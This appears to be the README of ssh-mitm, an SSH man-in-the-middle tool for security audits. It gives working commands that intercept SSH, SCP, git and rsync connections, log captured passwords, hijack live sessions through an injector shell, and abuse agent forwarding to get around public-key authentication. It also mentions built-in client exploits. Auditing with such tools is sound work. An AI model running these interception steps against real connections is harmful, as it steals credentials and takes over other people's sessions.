ssh mitm server for security audits supporting public key authentication, session hijacking and file manipulation
- Hijacking and logging of terminal sessions
- support for ssh commands (e.g. git over ssh)
- SCP and SFTP
- store files
- replace files
- inject additional files
- Agent Forwarding
- Port Forwarding
- Check and test clients against known vulnerabilities
- Plugin support
Connect to the network
To start an intercepting mitm-ssh server on Port 10022, all you have to do is run a single command.
$ ssh-mitm --remote-host 192.168.0.x
Now let's try to connect to the ssh-mitm server.
$ ssh -p 10022 user@proxyserver
You will see the credentials in the log output.
2021-01-01 11:38:26,098 [INFO] Client connection established with parameters: Remote Address: 192.168.0.x Port: 22 Username: user Password: supersecret Key: None Agent: None
Hijack SSH sessions
When a client connects, the ssh-mitm starts a new server, which is used for session hijacking.
[INFO] created injector shell on port 34463
To hijack this session, you can use your favorite ssh client. All you have to do is to connect to the hijacked session.
$ ssh -p 34463 127.0.0.1
SSH-MITM proxy server is capable of advanced man in the middle attacks and can be used in scenarios, where the remote host is not known or a single remote host is not sufficient or public key authentication is usded.
Public key authentication
Public key authentication is a way of logging into an SSH/SFTP account using a cryptographic key rather than a password.
The advantage is, that no confidential data needs to be sent to the remote host which can be intercepted by a man in the middle attack.
Due to this design concept, SSH-MITM proxy server is not able to reuse the data provided during authentication.
It you need to intercept a client with public key authentication, there are some options.
SSH supports agent forwarding, which allows a remote host to authenticate against another remote host.
SSH-MITM proxy server is able to request the agent from the client and use it for remote authentication. By using this feature, a SSH-MITM proxy server is able to do a full man in the middle attack.
Using agent forwarding, SSH-MITM proxy server must be started with --request-agent.
$ ssh-mitm --request-agent --remote-host 192.168.0.x
The client must be started with agent forwarding enabled.
$ ssh -A -p 10022 user@proxyserver
In most cased, when git is used over ssh, public key authentication is used. The default git command does not have a forward agent parameter.
To enable agent forwarding, git has to be executed with the
GIT_SSH_COMMAND environment variable.
# start the ssh server ssh-mitm --remote-host github.com --request-agent --scp-interface debug_traffic # invoke git commands GIT_SSH_COMMAND="ssh -A" git clone ssh://firstname.lastname@example.org:10022/ssh-mitm/ssh-mitm.git
When ssh-mitm is used to intercept rsync, the port must be provided as a parameter to rsync. Also the agent can be forwarded, if needed.
To sync a local directory with a remote directory, rsync can be executed with following parameters.
rsync -r -e 'ssh -p 10022 -A' /local/folder/ email@example.com:/remote/folder/
SSH-MITM has some client exploits integrated, which can be used to audit various ssh clients like OpenSSH and PuTTY.
Full Documentation: https://docs.ssh-mitm.at